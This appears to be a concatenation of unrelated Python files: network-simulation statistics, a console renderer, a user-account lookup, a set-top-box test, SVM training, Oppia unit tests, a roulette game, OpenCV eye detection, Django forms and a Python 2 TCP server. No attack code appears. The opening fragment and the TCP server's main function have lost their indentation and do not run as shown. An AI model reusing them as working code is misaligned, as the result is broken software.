erreur_throughput_RSSI_classes={}
erreur_clients_deficit_RSSI_classes={}
erreur_deficit_FF_classes={}
erreur_throughput_FF_classes={}
erreur_clients_deficit_FF_classes={}
erreur_deficit_LL_classes={}
erreur_throughput_LL_classes={}
erreur_clients_deficit_LL_classes={}
for cla in range(0,priority_class):
erreur_deficit_priority_classes[cla]=SE_deficit_priority_classes[cla]* 1.96
erreur_throughput_priority_classes[cla]=SE_throughput_priority_classes[cla]* 1.96
erreur_clients_deficit_priority_classes[cla]=SE_clients_deficit_priority_classes[cla]* 1.96
erreur_deficit_RSSI_classes[cla]=SE_deficit_RSSI_classes[cla]* 1.96
erreur_throughput_RSSI_classes[cla]=SE_throughput_RSSI_classes[cla]* 1.96
erreur_clients_deficit_RSSI_classes[cla]=SE_clients_deficit_RSSI_classes[cla]* 1.96
erreur_deficit_FF_classes[cla]=SE_deficit_FF_classes[cla]* 1.96
erreur_throughput_FF_classes[cla]=SE_throughput_FF_classes[cla]* 1.96
erreur_clients_deficit_FF_classes[cla]=SE_clients_deficit_FF_classes[cla]* 1.96
erreur_deficit_LL_classes[cla]=SE_deficit_LL_classes[cla]* 1.96
erreur_throughput_LL_classes[cla]=SE_throughput_LL_classes[cla]* 1.96
erreur_clients_deficit_LL_classes[cla]=SE_clients_deficit_LL_classes[cla]* 1.96
s_deficit_priority=str(5*density_nodes)+" "+str(moy_deficit_priority)+" "+str(erreur_deficit_priority)+" "+str(moy_deficit_RSSI)+" "+str(erreur_deficit_RSSI)+" "+str(moy_deficit_FF)+" "+str(erreur_deficit_FF)+" "+str(moy_deficit_LL)+" "+str(erreur_deficit_LL)+"\n"
s_throughput_priority=str(5*density_nodes)+" "+str(moy_throughput_priority)+" "+str(erreur_throughput_priority)+" "+str(moy_throughput_RSSI)+" "+str(erreur_throughput_RSSI)+" "+str(moy_throughput_FF)+" "+str(erreur_throughput_FF)+" "+str(moy_throughput_LL)+" "+str(erreur_throughput_LL)+"\n"
s_std_load_priority=str(5*density_nodes)+" "+str(moy_std_load_priority)+" "+str(erreur_std_load_priority)+" "+str(moy_std_load_RSSI)+" "+str(erreur_std_load_RSSI)+" "+str(moy_std_load_FF)+" "+str(erreur_std_load_FF)+" "+str(moy_std_load_LL)+" "+str(erreur_std_load_LL)+"\n"
s_maximum_load_priority=str(5*density_nodes)+" "+str(moy_maximum_load_priority)+" "+str(erreur_maximum_load_priority)+" "+str(moy_maximum_load_RSSI)+" "+str(erreur_maximum_load_RSSI)+" "+str(moy_maximum_load_FF)+" "+str(erreur_maximum_load_FF)+" "+str(moy_maximum_load_LL)+" "+str(erreur_maximum_load_LL)+"\n"
s_clients_deficit_priority=str(5*density_nodes)+" "+str(moy_clients_deficit_priority)+" "+str(erreur_clients_deficit_priority)+" "+str(moy_clients_deficit_RSSI)+" "+str(erreur_clients_deficit_RSSI)+" "+str(moy_clients_deficit_FF)+" "+str(erreur_clients_deficit_FF)+" "+str(moy_clients_deficit_LL)+" "+str(erreur_clients_deficit_LL)+"\n"
s_deficit_classes=str(5*density_nodes)
s_throughput_classes=str(5*density_nodes)
s_nb_clients_deficit_classes=str(5*density_nodes)
for cla in range(0,priority_class):
s_deficit_classes=s_deficit_classes+" "+str(round(moy_deficit_classes[cla],5))+" "+str(round(erreur_deficit_classes[cla],5))+" "+str(round(moy_deficit_RSSI_classes[cla],5))+" "+str(round(erreur_deficit_RSSI_classes[cla],5))+" "+str(round(moy_deficit_FF_classes[cla],5))+" "+str(round(erreur_deficit_FF_classes[cla],5))+" "+str(round(moy_deficit_LL_classes[cla],5))+" "+str(round(erreur_deficit_LL_classes[cla],5))
s_throughput_classes=s_throughput_classes+" "+str(round(moy_throughput_classes[cla],5))+" "+str(round(erreur_throughput_classes[cla],5))+" "+str(round(moy_throughput_RSSI_classes[cla],5))+" "+str(round(erreur_throughput_RSSI_classes[cla],5))+" "+str(round(moy_throughput_FF_classes[cla],5))+" "+str(round(erreur_throughput_FF_classes[cla],5))+" "+str(round(moy_throughput_LL_classes[cla],5))+" "+str(round(erreur_throughput_LL_classes[cla],5))
s_nb_clients_deficit_classes=s_nb_clients_deficit_classes+" "+str(round(moy_clients_deficit_classes[cla],5))+" "+str(round(erreur_clients_deficit_classes[cla],5))+" "+str(round(moy_clients_deficit_RSSI_classes[cla],5))+" "+str(round(erreur_clients_deficit_RSSI_classes[cla],5))+" "+str(round(moy_clients_deficit_FF_classes[cla],5))+" "+str(round(erreur_clients_deficit_FF_classes[cla],5))+" "+str(round(moy_clients_deficit_LL_classes[cla],5))+" "+str(round(erreur_clients_deficit_LL_classes[cla],5))
s_deficit_classes=s_deficit_classes+"\n"
s_throughput_classes=s_throughput_classes+"\n"
s_nb_clients_deficit_classes=s_nb_clients_deficit_classes+"\n"
g_deficit.write(s_deficit_priority)
g_throughput.write(s_throughput_priority)
g_APs_std_load.write(s_std_load_priority)
g_APs_maximum_load.write(s_maximum_load_priority)
g_clients_Nb_deficit.write(s_clients_deficit_priority)
g_PLOT_deficit_classes.write(s_deficit_classes)
g_throughput_classes.write(s_throughput_classes)
g_clients_Nb_deficit_class.write(s_nb_clients_deficit_classes)
moy_deficit_priority=0
moy_throughput_priority=0
moy_std_load_priority=0
moy_maximum_load_priority=0
moy_clients_deficit_priority=0
erreur_deficit_priority=0
erreur_throughput_priority=0
erreur_std_load_priority=0
erreur_maximum_load_priority=0
erreur_clients_deficit_priority=0
moy_deficit_RSSI=0
moy_throughput_RSSI=0
moy_std_load_RSSI=0
moy_maximum_load_RSSI=0
moy_clients_deficit_RSSI=0
erreur_deficit_RSSI=0
erreur_throughput_RSSI=0
erreur_std_load_RSSI=0
erreur_maximum_load_RSSI=0
erreur_clients_deficit_RSSI=0
moy_deficit_FF=0
moy_throughput_FF=0
moy_std_load_FF=0
moy_maximum_load_FF=0
moy_clients_deficit_FF=0
erreur_deficit_FF=0
erreur_throughput_FF=0
erreur_std_load_FF=0
erreur_maximum_load_FF=0
erreur_clients_deficit_FF=0
moy_deficit_LL=0
moy_throughput_LL=0
moy_std_load_LL=0
moy_maximum_load_LL=0
moy_clients_deficit_LL=0
erreur_deficit_LL=0
erreur_throughput_LL=0
erreur_std_load_LL=0
erreur_maximum_load_LL=0
erreur_clients_deficit_LL=0
for cla in range(0,priority_class):
moy_deficit_classes[cla]=0
moy_throughput_classes[cla]=0
moy_clients_deficit_classes[cla]=0
erreur_deficit_classes[cla]=0
erreur_throughput_classes[cla]=0
erreur_clients_deficit_classes[cla]=0
moy_deficit_RSSI_classes[cla]=0
moy_throughput_RSSI_classes[cla]=0
moy_clients_deficit_RSSI_classes[cla]=0
erreur_deficit_RSSI_classes[cla]=0
erreur_throughput_RSSI_classes[cla]=0
erreur_clients_deficit_RSSI_classes[cla]=0
moy_deficit_FF_classes[cla]=0
moy_throughput_FF_classes[cla]=0
moy_clients_deficit_FF_classes[cla]=0
erreur_deficit_FF_classes[cla]=0
erreur_throughput_FF_classes[cla]=0
erreur_clients_deficit_FF_classes[cla]=0
moy_deficit_LL_classes[cla]=0
moy_throughput_LL_classes[cla]=0
moy_clients_deficit_LL_classes[cla]=0
erreur_deficit_LL_classes[cla]=0
erreur_throughput_LL_classes[cla]=0
erreur_clients_deficit_LL_classes[cla]=0
g_deficit.close()
g_throughput.close()
g_APs_std_load.close()
g_APs_maximum_load.close()
g_clients_Nb_deficit.close()
g_clients_Nb_deficit_class.close()
g_throughput_classes.close()
g_PLOT_deficit_classes.close()
|
import os
class Console():
    """Render progress output as plain text on standard output.

    The ``get_*`` helpers return their input unchanged; they exist so a
    richer renderer exposing the same interface could add real markup.
    """

    def write_title(self, title):
        """A title is simply a level-1 header."""
        self.write_header(title, 1)

    def write_header(self, msg, level=1):
        """Print *msg* decorated according to *level* (1, 2 or 3).

        Unknown levels fall through and print the bare message.
        """
        stars = "*" * 50
        output = msg
        if level == 1:
            output = "\n".join((stars, stars, " " + msg, stars, stars)) + "\n"
        if level == 2:
            output = "\n".join((stars, " " + msg, stars)) + "\n"
        if level == 3:
            output = msg + "\n" + "-" * len(msg)
        print(output)

    def write_footer(self, msg):
        """Footers are not printed; the text is handed back to the caller."""
        return msg

    def get_bold(self, msg):
        """Plain text has no bold styling; return *msg* unchanged."""
        return msg

    def get_italic(self, msg):
        """Plain text has no italic styling; return *msg* unchanged."""
        return msg

    def get_underlined(self, msg):
        """Plain text has no underline styling; return *msg* unchanged."""
        return msg

    def get_hyperlink(self, link, text):
        """Render a hyperlink as ``text(link)``."""
        return text + "(" + link + ")"

    def write_separator(self):
        """Print a horizontal rule."""
        print("-" * 50)

    def write_line(self, msg):
        """Print *msg* verbatim."""
        print(msg)

    def completed(self):
        """Lifecycle hook; nothing to do for a console renderer."""
        pass

    def start(self):
        """Lifecycle hook; nothing to do for a console renderer."""
        pass
|
import pwd
import grp

# Look up the account entry for user "larsx" in the system password database.
# (KeyError is raised if the account does not exist.)
larsx = pwd.getpwnam('larsx')
# BUG FIX: the original used Python 2 ``print`` statements, which are a
# SyntaxError on Python 3; converted to print() calls, output unchanged.
print(larsx)
print("""
Name: {}
UID: {}
Home: {}
Shell: {}
""".format(larsx.pw_name, larsx.pw_uid, larsx.pw_dir, larsx.pw_shell))
# Resolve the user's primary group from the system group database.
group = grp.getgrgid(larsx.pw_gid)
print("""
Group: {}
GID: {}
""".format(group.gr_name, group.gr_gid))
|
# -*- coding: utf-8 -*-
"""
Title:
Description:
Author: haithem ben abdelaziz
Date:
Version:
Environment:
"""
import sc_stbt
import time
import stbt
def step1():
    """Navigate from home to the detail page of a free movie.

    steps: 1-go to home
    2-open library menu
    3-open movies menu
    4-searching a free video
    5-open the detail page of the free content
    :return: None — all work is done through sc_stbt side effects.
    """
    sc_stbt.back_to_home()
    sc_stbt.open_library()
    sc_stbt.goto_movies_menu()
    sc_stbt.select_free_video()
    sc_stbt.open_movie_detail_page()
def step2():
    """
    start a movie and calculate time from clicking ok to the first UI of the playback
    then back to the detail page of the content
    :return: None — all work is done through sc_stbt side effects.
    """
    sc_stbt.start_movie()
    # NOTE(review): presumably detect_movie() waits for the first playback
    # frame and the timing is recorded inside sc_stbt — confirm.
    sc_stbt.detect_movie()
    # KEY_BACK leaves playback and returns to the movie's detail page.
    sc_stbt.open_movie_detail_page(press="KEY_BACK")
def main_test():
    """Run the playback-start performance scenario.

    1-do step1 once (navigate to a free movie's detail page)
    2-do step2 200 times (each run measures playback-start time)
    :return: None — all work is done through sc_stbt side effects.
    """
    sc_stbt.repeat(lambda: step1(), occurence=1)
    sc_stbt.repeat(lambda: step2(), occurence=200)
    # BUG FIX: the original ended with
    #   sc_stbt.repeat(lambda: main_test(), occurence=1)
    # *inside* main_test, making main_test call itself unconditionally and
    # recurse without bound. Removed; re-invoke main_test from the caller
    # if the whole scenario must be repeated.
|
import os
from svmutil import svm_read_problem, svm_train, svm_save_model

# Absolute path of the working directory, with a trailing slash so file
# names can be appended directly.
cdir = os.path.abspath('.') + "/"


def train_svm_model():
    """Train an SVM on the pixel-feature training set and save the model.

    Reads ``train_pix_feature_xy.txt`` (libsvm problem format) from the
    current directory and writes the trained model to the file ``model``.
    """
    y, x = svm_read_problem(cdir + 'train_pix_feature_xy.txt')
    model = svm_train(y, x)
    # BUG FIX: ``print type(model)`` is Python 2 syntax and a SyntaxError
    # on Python 3; converted to a print() call, output unchanged.
    print(type(model))
    svm_save_model(cdir + 'model', model)


if __name__ == "__main__":
    train_svm_model()
# Import itemgetter from the operator module
# Now create a variable named sorted_fruit that used sorted() and itemgetter() to sort fruit_list by the second item in each tuple
from operator import itemgetter

# Inventory of (fruit name, quantity) pairs, to be ordered by quantity.
fruit_list = [
    ('apple', 2),
    ('banana', 5),
    ('coconut', 1),
    ('durian', 3),
    ('elderberries', 4)
]

# itemgetter(1) extracts the quantity, so sorted() orders the pairs by it.
by_quantity = itemgetter(1)
sorted_fruit = sorted(fruit_list, key=by_quantity)
print(sorted_fruit)
# coding: utf-8
#
# Copyright 2022 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for methods defined in learner group fetchers."""
from __future__ import annotations
from core.domain import learner_group_fetchers
from core.domain import learner_group_services
from core.tests import test_utils
class LearnerGroupFetchersUnitTests(test_utils.GenericTestBase):
    """Tests for learner group fetchers."""
    # Fixed user ids used to build the shared learner-group fixture in setUp.
    FACILITATOR_ID = 'facilitator_user_1'
    LEARNER_ID_1 = 'learner_user_1'
    LEARNER_ID_2 = 'learner_user_2'
    def setUp(self) -> None:
        """Create one learner group with one facilitator and two invited
        learners; all tests below run against this fixture."""
        super().setUp()
        self.LEARNER_GROUP_ID = (
            learner_group_fetchers.get_new_learner_group_id()
        )
        self.learner_group = learner_group_services.create_learner_group(
            self.LEARNER_GROUP_ID, 'Learner Group Name', 'Description',
            [self.FACILITATOR_ID], [self.LEARNER_ID_1, self.LEARNER_ID_2],
            ['subtopic_id_1'], ['story_id_1'])
    def test_get_new_learner_group_id(self) -> None:
        """A new learner group id can always be generated."""
        self.assertIsNotNone(learner_group_fetchers.get_new_learner_group_id())
    def test_get_learner_group_by_id(self) -> None:
        """Unknown ids return None (non-strict) or raise (strict); a known
        id returns its learner group."""
        fake_learner_group_id = 'fake_learner_group_id'
        fake_learner_group = learner_group_fetchers.get_learner_group_by_id(
            fake_learner_group_id)
        self.assertIsNone(fake_learner_group)
        learner_group = learner_group_fetchers.get_learner_group_by_id(
            self.LEARNER_GROUP_ID
        )
        # Ruling out the possibility of None for mypy type checking.
        assert learner_group is not None
        self.assertIsNotNone(learner_group)
        self.assertEqual(learner_group.group_id, self.LEARNER_GROUP_ID)
        with self.assertRaisesRegex(
            Exception,
            'No LearnerGroupModel found for the given group_id: '
            'fake_learner_group_id'
        ):
            learner_group_fetchers.get_learner_group_by_id(
                fake_learner_group_id, strict=True
            )
    def test_raises_error_if_learner_group_model_is_fetched_with_strict_and_invalid_id( # pylint: disable=line-too-long
        self
    ) -> None:
        """Strict multi-get of learner-group user models raises for an
        unknown user id."""
        with self.assertRaisesRegex(
            Exception,
            'No LearnerGroupsUserModel exists for the user_id: invalid_id'
        ):
            learner_group_fetchers.get_learner_group_models_by_ids(
                ['invalid_id'], strict=True
            )
    def test_get_learner_groups_of_facilitator(self) -> None:
        """Only groups facilitated by the given user id are returned."""
        fake_facilitator_id = 'fake_facilitator_id'
        fake_learner_groups = (
            learner_group_fetchers.get_learner_groups_of_facilitator(
                fake_facilitator_id
            )
        )
        self.assertEqual(len(fake_learner_groups), 0)
        learner_groups = (
            learner_group_fetchers.get_learner_groups_of_facilitator(
                self.FACILITATOR_ID
            )
        )
        self.assertEqual(len(learner_groups), 1)
        self.assertEqual(learner_groups[0].group_id, self.LEARNER_GROUP_ID)
    def test_can_multi_learners_share_progress(self) -> None:
        """Per-learner progress-sharing flags reflect the value passed when
        each learner was added to the group."""
        learner_group_services.add_learner_to_learner_group(
            self.LEARNER_GROUP_ID, self.LEARNER_ID_1, True)
        learner_group_services.add_learner_to_learner_group(
            self.LEARNER_GROUP_ID, self.LEARNER_ID_2, False)
        self.assertEqual(
            learner_group_fetchers.can_multi_learners_share_progress(
                [self.LEARNER_ID_1, self.LEARNER_ID_2], self.LEARNER_GROUP_ID
            ), [True, False])
    def test_get_invited_learner_groups_of_learner(self) -> None:
        """Groups a learner was invited to (in setUp) are returned; unknown
        learner ids get an empty list."""
        fake_learner_id = 'fake_learner_id'
        learner_groups = (
            learner_group_fetchers.get_invited_learner_groups_of_learner(
                fake_learner_id
            )
        )
        self.assertEqual(len(learner_groups), 0)
        learner_groups = (
            learner_group_fetchers.get_invited_learner_groups_of_learner(
                self.LEARNER_ID_1
            )
        )
        self.assertEqual(len(learner_groups), 1)
        self.assertEqual(learner_groups[0].group_id, self.LEARNER_GROUP_ID)
    def test_get_learner_groups_joined_by_learner(self) -> None:
        """A group appears in the joined list only after the learner is
        actually added to it (invitation alone is not enough)."""
        learner_groups = (
            learner_group_fetchers.get_learner_groups_joined_by_learner(
                self.LEARNER_ID_1
            )
        )
        self.assertEqual(len(learner_groups), 0)
        learner_group_services.add_learner_to_learner_group(
            self.LEARNER_GROUP_ID, self.LEARNER_ID_1, True)
        learner_groups = (
            learner_group_fetchers.get_learner_groups_joined_by_learner(
                self.LEARNER_ID_1
            )
        )
        self.assertEqual(len(learner_groups), 1)
        self.assertEqual(learner_groups[0].group_id, self.LEARNER_GROUP_ID)
|
# pyroulette in development. dave ikin 2021
# roulette simulator
from sys import exit
from random import choice


def roulette():
    """Repeatedly spin a single-zero (European, 0-36) roulette wheel.

    Each round prints the winning number and asks whether to play again;
    any answer other than 'y'/'Y' exits the program.
    """
    # 0-36 inclusive — equivalent to the original hand-written list.
    numbers = list(range(37))
    # BUG FIX: the original replayed by calling roulette() recursively,
    # growing the call stack by one frame per round; a loop plays
    # indefinitely without that risk.
    while True:
        winner = choice(numbers)
        print(f' {winner} wins.')
        again = input('Again? y/n')
        if again not in ('y', 'Y'):
            exit()


roulette()
|
# переработка фотки лица в набор координат
import sys
import os
import cv2
import numpy as np
from matplotlib import pyplot as plt
BLOCKS_COUNT = 4
"""
Объявляем параметры которые нужны для обучения
face_params = (x, y, w, h) координаты и размеры найденного лица
eyes_params = (x, y, w, h) координаты и размеры пары глаз
left_eye = (x, y, r) координаты и радиус найденного зрачка
right_eye = (x, y, r) координаты и радиус найденного зрачка
"""
def decode(block_index):
    """Extract face/eye training features from every photo in directory
    *block_index*.

    For each image a Haar cascade finds the face, an eye-pair cascade finds
    the eyes inside it, the eye strip is split at its horizontal midpoint,
    and each half is searched for a pupil (Hough circles) and an eye corner.

    Returns a list of dicts with keys:
      face_params  = (x, y, w, h)  detected face rectangle
      eyes_params  = (x, y, w, h)  detected eye-pair rectangle (face-relative)
      left_eye / right_eye = (x, y, r)  pupil centre and radius
      left_eye_corners / right_eye_corners = (x, y)  corner point
      block_id     = block_index
    Photos are filtered through check_data() before being kept.
    """
    face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt3.xml')
    eye_cascade = cv2.CascadeClassifier('haarcascade_mcs_eyepair_big.xml')
    block_data = []
    block_dir = os.walk('{0}'.format(block_index))
    for d, dirs, files in block_dir:
        # Process every photo file found under the block's directory.
        for f in files:
            # BUG FIX: reset every per-photo feature here. Previously
            # left_eye_corners/right_eye_corners were never initialised —
            # a photo with no detected face or eye pair raised NameError
            # when building face_decoded — and features detected in an
            # earlier photo leaked into later ones.
            face_params = None
            eyes_params = None
            left_eye = None
            right_eye = None
            left_eye_corners = None
            right_eye_corners = None
            img = cv2.imread('{0}/{1}'.format(block_index, f))
            # (the original converted to grayscale twice; once is enough)
            gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
            faces = face_cascade.detectMultiScale(gray, 1.35, 5)
            if faces is not None and len(faces) > 0:
                # Only the first detected face is used (break below).
                for (x, y, w, h) in faces:
                    face_params = (x, y, w, h)
                    roi_gray = gray[y:y + h, x:x + w]
                    roi_color = img[y:y + h, x:x + w]
                    roi_gray = cv2.equalizeHist(roi_gray, roi_color)
                    eyes = eye_cascade.detectMultiScale(roi_gray, 1.3, 3)
                    if eyes is not None and len(eyes) > 0:
                        # Eye pair found; only the first one is used.
                        for (ex, ey, ew, eh) in eyes:
                            eyes_params = (ex, ey, ew, eh)
                            eye_strip = roi_color[ey:ey + eh, ex:ex + ew]
                            strip_w = eye_strip.shape[1]
                            # Split the strip at its horizontal midpoint:
                            # left half = left eye, right half = right eye.
                            half_x = ex + int(ew / 2)
                            roi_gray_left_img = roi_gray[ey: ey + eh, ex: half_x]
                            roi_gray_right_img = roi_gray[ey: ey + eh, half_x:]
                            # Search each half for the pupil and a corner.
                            left_eye = get_circles(roi_gray_left_img, strip_w)
                            right_eye = get_circles(roi_gray_right_img, strip_w)
                            left_eye_corners = get_eye_corners(roi_gray_left_img)
                            right_eye_corners = get_eye_corners(roi_gray_right_img)
                            break
                    break
            face_decoded = {
                'face_params': face_params,
                'eyes_params': eyes_params,
                'left_eye': left_eye,
                'right_eye': right_eye,
                'left_eye_corners': left_eye_corners,
                'right_eye_corners': right_eye_corners,
                'block_id': block_index
            }
            # Keep only photos where check_data accepts the feature set.
            if check_data(face_decoded):
                block_data.append(face_decoded)
    return block_data
def get_circles(img, tmp_w):
    """Return (x, y, r) — centre and radius of the pupil found in *img* via
    Hough circle detection, or None when no circle is found.

    *tmp_w* is the width of the detected eye strip.
    """
    #img = cv2.medianBlur(img, 5)
    #print(tmp_w)
    # NOTE(review): positionally these arguments are dp=1 and minDist=2,
    # which puts tmp_w/3 into HoughCircles' optional ``circles`` output
    # slot — tmp_w/3 was presumably intended as minDist. Confirm against
    # the cv2.HoughCircles signature before changing.
    circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1,2, tmp_w/3,
    param1=30,param2=30,minRadius=0,maxRadius=0)
    if not circles is None:
        circles = np.uint16(np.around(circles))
        # Only the first detected circle is returned.
        for i in circles[0, :]:
            return (i[0], i[1], i[2])
    else:
        return None
def get_eye_corners(img):
    """Return (x, y) of the strongest corner detected in the eye image, or
    None when no corner is found.

    NOTE(review): up to 20 corners are requested but only the first is
    returned — presumably intentional; confirm.
    """
    img = np.array(img)
    corners = cv2.goodFeaturesToTrack(img, 20, 0.01, 30)
    if corners is not None:
        # np.int0 was an alias removed in NumPy 2.0; np.intp is the
        # supported spelling with identical behaviour.
        corners = np.intp(corners)
        for corner in corners:
            x, y = corner.ravel()
            return (x, y)
    return None
def check_data(data_tpl):
    """Return True when every collected value is present (not None).

    BUG FIX: the caller passes the ``face_decoded`` dict, and
    ``None in some_dict`` tests the *keys* (always strings here), so the
    original check always passed.  For dicts the values are now tested;
    plain sequences keep the original semantics.
    """
    values = data_tpl.values() if isinstance(data_tpl, dict) else data_tpl
    return None not in values
if __name__ == '__main__':
    # Decode every photo block once.  BUG FIX: the original called
    # decode(i) twice per block -- once into an unused variable and
    # once for the append -- doubling the (expensive) detection work.
    data = []
    for i in range(BLOCKS_COUNT):
        data.append(decode(i))
    print(data)
import pandas as pd

# Keywords indicating public-participation requirements in the charter.
keywords = [
    "public review",
    "public hearing",
    "vote",
    "public participation"
]

# NYC city charter text file exported from
# http://library.amlegal.com/nxt/gateway.dll/New%20York/charter/newyorkcitycharter?f=templates$fn=default.htm$3.0$vid=amlegal:newyork_ny
# A context manager guarantees the handle is closed (the original leaked it).
rows = []
# Initialise so a keyword hit before the first heading cannot raise
# NameError (the original would have crashed in that case).
chapter = None
section = None
with open('document.txt', 'r') as f:
    for line in f:
        # Track the enclosing chapter/section; each stays constant until
        # the next heading line is entered.
        if line.startswith('Chapter'):
            chapter = line[7:len(line) - 1]
        if line.startswith('Section'):
            section = line[7:len(line) - 1]
        # Record the current chapter/section when any keyword occurs.
        if any(keyword in line for keyword in keywords):
            rows.append({'Chapter': chapter, 'Section': section})

# Build the frame in one shot: DataFrame.append was deprecated and then
# removed in pandas 2.0, and per-row appends were quadratic anyway.
df = pd.DataFrame(rows, columns=['Chapter', 'Section'])

# remove duplicate chapters and sections
df = df.drop_duplicates()

# save the dataframe to a csv file
df.to_csv('inventory.csv')
|
# -*- coding: utf-8 -*-
from django import forms
class StudentInfoForm(forms.Form):
    """Profile form for a student account (10-digit numeric id)."""
    id = forms.CharField(max_length=10)
    contact = forms.CharField(max_length=11)
    name = forms.CharField(max_length=20)
    gender = forms.IntegerField()
    college = forms.CharField(max_length=50)
    major = forms.CharField(max_length=50)
    grade = forms.IntegerField()
    gpa = forms.FloatField()
    credits = forms.FloatField()

    def clean_id(self):
        """Require the id to be exactly 10 digits.

        BUG FIX: the original used ``and``, which only rejected values
        that were both the wrong length *and* non-numeric; either
        violation alone must fail validation.
        """
        id = self.cleaned_data['id']
        if len(id) != 10 or not str(id).isdigit():
            raise forms.ValidationError("学号为10位数字!")
        return id

    def clean_contact(self):
        """Require the contact number to be purely numeric."""
        contact = self.cleaned_data['contact']
        if not str(contact).isdigit():
            raise forms.ValidationError("电话号码为纯数字!")
        return contact

    def clean_gender(self):
        """Gender must be encoded as 0 or 1."""
        gender = self.cleaned_data['gender']
        if gender != 1 and gender != 0:
            raise forms.ValidationError("不要干坏事哦!")
        return gender
class FacultyInfoForm(forms.Form):
    """Profile form for a faculty account (6-digit numeric id)."""
    id = forms.CharField(max_length=10)
    contact = forms.CharField(max_length=11)
    name = forms.CharField(max_length=20)
    gender = forms.IntegerField()
    college = forms.CharField(max_length=50)
    major = forms.CharField(max_length=50)
    degree = forms.CharField(max_length=20)
    title = forms.CharField(max_length=20)

    def clean_id(self):
        """Require the id to be exactly 6 digits.

        BUG FIX: ``and`` changed to ``or`` -- either a wrong length or a
        non-numeric value alone must fail validation.
        """
        id = self.cleaned_data['id']
        if len(id) != 6 or not str(id).isdigit():
            raise forms.ValidationError("学号为6位数字!")
        return id

    def clean_contact(self):
        """Require the contact number to be purely numeric."""
        contact = self.cleaned_data['contact']
        if not str(contact).isdigit():
            raise forms.ValidationError("电话号码为纯数字!")
        return contact

    def clean_gender(self):
        """Gender must be encoded as 0 or 1."""
        gender = self.cleaned_data['gender']
        if gender != 1 and gender != 0:
            raise forms.ValidationError("不要干坏事哦!")
        return gender
class AdminInfoForm(forms.Form):
    """Profile form for an administrator account (3-digit numeric id)."""
    id = forms.CharField(max_length=10)
    contact = forms.CharField(max_length=11)
    name = forms.CharField(max_length=20)
    gender = forms.IntegerField()
    college = forms.CharField(max_length=50)

    def clean_id(self):
        """Require the id to be exactly 3 digits.

        BUG FIX: ``and`` changed to ``or`` -- either a wrong length or a
        non-numeric value alone must fail validation.
        """
        id = self.cleaned_data['id']
        if len(id) != 3 or not str(id).isdigit():
            raise forms.ValidationError("学号为3位数字!")
        return id

    def clean_contact(self):
        """Require the contact number to be purely numeric."""
        contact = self.cleaned_data['contact']
        if not str(contact).isdigit():
            raise forms.ValidationError("电话号码为纯数字!")
        return contact

    def clean_gender(self):
        """Gender must be encoded as 0 or 1."""
        gender = self.cleaned_data['gender']
        if gender != 1 and gender != 0:
            raise forms.ValidationError("不要干坏事哦!")
        return gender
class UserPhotoForm(forms.Form):
    """Avatar upload form: image files only, capped at 20 MB."""
    photo = forms.FileField(
        label='Select a file',
        help_text='max. 20 megabytes'
    )

    def clean_photo(self):
        """Validate that the upload is an image no larger than 20 MB.

        BUG FIX: the limit constant was 2 MB while both the help text
        and the error message say 20 MB; use the public ``photo.size``
        instead of the private ``_size`` attribute (removed in newer
        Django versions).
        """
        CONTENT_TYPES = ['image']
        MAX_UPLOAD_SIZE = 1024 * 1024 * 20  # 20M, matching the help text
        photo = self.cleaned_data['photo']
        content_type = photo.content_type.split('/')[0]
        if content_type in CONTENT_TYPES:
            if photo.size > MAX_UPLOAD_SIZE:
                raise forms.ValidationError('上传大小限制为20M!')
        else:
            raise forms.ValidationError('请上传图像文件!')
        return photo
|
#! /usr/bin/python
#coding=utf-8
import socket
import ParseData
import readxml
import struct
import time
import ConfigParser
HOST = ''  # empty host: bind on all interfaces
PORT = 50001  # default port; initserver() actually reads PORT from server.ini
ADDR = (HOST, PORT)  # NOTE(review): unused by initserver, which rebuilds addr from config
BUFFSIZE = 65535  # max bytes accepted per recv()
def xmlparse(fname):
    """Load the message-parsing policy from an XML configuration file.

    ConvertXmlToDict returns the whole document as a nested dict; only
    the 'policy' subtree is needed by the parser.
    """
    parsed = readxml.ConvertXmlToDict(fname)
    return parsed['policy']
def initserver():
xmldict = xmlparse('DataParse.xml')
print "success parse xml ..."
cfg = ConfigParser.ConfigParser()
cfg.read('server.ini')
logname = cfg.get('SETTING', 'log')
f = open(logname, 'w')
port = cfg.getint('SETTING', 'PORT')
addr = ('', port)
tcpsrv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsrv.bind(addr)
tcpsrv.listen(10)
print "waiting for client connect ...."
while True:
clientsock , c_addr = tcpsrv.accept()
print 'accept sock'
while True:
try:
#clientsock.settimeout(5)
msg = clientsock.recv(BUFFSIZE)
print "msg lenth", len(msg)
if not msg: break
else:
try:
ack,log = ParseData.parse(msg, xmldict)
clientsock.send(ack)
f.write(log + '\r')
except struct.error:
print 'parse error'
clientsock.close()
break
except socket.timeout:
clientsock.close()
print 'socket close'
break
except socket.error:
clientsock.close()
print 'socket close'
break
tcpsrv.close()
f.close()
if __name__ == '__main__':
    initserver()
    # NOTE(review): initserver() loops forever, so this sleep only runs
    # after an error/interrupt -- presumably to let output flush; confirm.
    time.sleep(1)
|
# Python 2 script: tag Snapchat images with keywords transferred from
# their nearest Dreamstime neighbours in VGG feature space.
import os
import itertools
import numpy as np
import cPickle
from collections import Counter
from sklearn.neighbors import NearestNeighbors
src_tag = 'val'  # which dreamstime split provides the keyword source
base_dir = '/media/researchshare/linjie/data/'
target_path = base_dir + 'snapchat/features/vgg.bin'
src_path = base_dir + 'dreamstime/features/vgg_'+src_tag+'.bin'
# Pre-extracted VGG feature matrices (rows = images).
target = cPickle.load(open(target_path,'rb'))
src = cPickle.load(open(src_path,'rb'))
#sample src for quick debugging
#src = src[:1000][:]
keyw_path = base_dir + 'dreamstime/keywords_dreamstime_list'
# Mapping from dreamstime image id -> list of keywords.
keywords = cPickle.load(open(keyw_path,'rb'))
list_path = '%s_list.txt' % src_tag
with open(list_path,'r') as f:
    image_list = [line.strip('\n') for line in f]
image_n = len(image_list)
feature_n = src.shape[0]
# Sanity check: the list length should match the feature-matrix rows.
print image_n
print feature_n
